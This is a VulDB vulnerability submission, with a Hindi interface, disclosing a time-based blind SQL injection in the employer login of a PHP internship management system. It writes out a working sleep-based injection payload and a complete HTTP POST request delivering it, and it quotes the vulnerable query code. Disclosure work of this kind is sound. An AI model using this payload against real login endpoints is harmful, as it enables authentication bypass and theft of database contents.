जमा करें #846889: Internship Portal file `employer/login.php` contains a Time-Based Blind SQL Injection vulnerability v1.0 SQL Injectionजानकारी

शीर्षकInternship Portal file `employer/login.php` contains a Time-Based Blind SQL Injection vulnerability v1.0 SQL Injection
विवरण## Internship Portal file `employer/login.php` contains a Time-Based Blind SQL Injection vulnerability Impact of the vulnerability An attacker can inject SQL syntax into the `email` parameter on the employer login endpoint. Because the application concatenates untrusted input directly into the SQL statement, an attacker can trigger database-side delays and confirm injection without valid credentials. This can lead to: - Authentication bypass in some payload variants - Database information disclosure through blind inference - Further compromise of employer accounts and backend data ### Payload: `[email protected]'and(select*from(select+sleep(5))a/**/union/**/select+1)='` ```text [email protected]'and(select*from(select+sleep(5))a/**/union/**/select+1)=' ``` ### POC: The vulnerable endpoint is `POST /employer/login.php`. The `email` and `password` parameters are inserted into SQL without parameterization. The relevant code in `employer/login.php` is: ```php $password = $_POST['password']; $sql = "SELECT * FROM employer WHERE password = '$password' AND email = '$email'"; ``` Send the following request: ```http POST /employer/login.php HTTP/1.1 Host: internship Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=qithgp1m1at8bieavidf4ddlnc [email protected]'and(select*from(select+sleep(5))a/**/union/**/select+1)='&password=452&login= ``` Expected result: The server response is delayed by about 5 seconds, which indicates that the injected `sleep(5)` expression was executed by the database. This confirms a time-based blind SQL injection in the `email` parameter of the employer login function. ### Sources download: ```text https://code-projects.org/internship-management-system-in-php-with-source-code/ ``` [Internship Management System In PHP With Source Code - Source Code & Projects](https://code-projects.org/internship-management-system-in-php-with-source-code/)
स्रोत⚠️ https://github.com/zzzxc643/CVE1/blob/main/assessment/vul7.md
उपयोगकर्ता
 SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
सबमिशन03/06/2026 04:01 PM (1 महीना पहले)
संयम04/07/2026 07:24 AM (1 month later)
स्थितिस्वीकृत
VulDB प्रविष्टि376296 [code-projects Internship Management System 1.0 Employer Login Endpoint employer/login.php email/password SQL इंजेक्शन]
अंक20

Interested in the pricing of exploits?

See the underground prices here!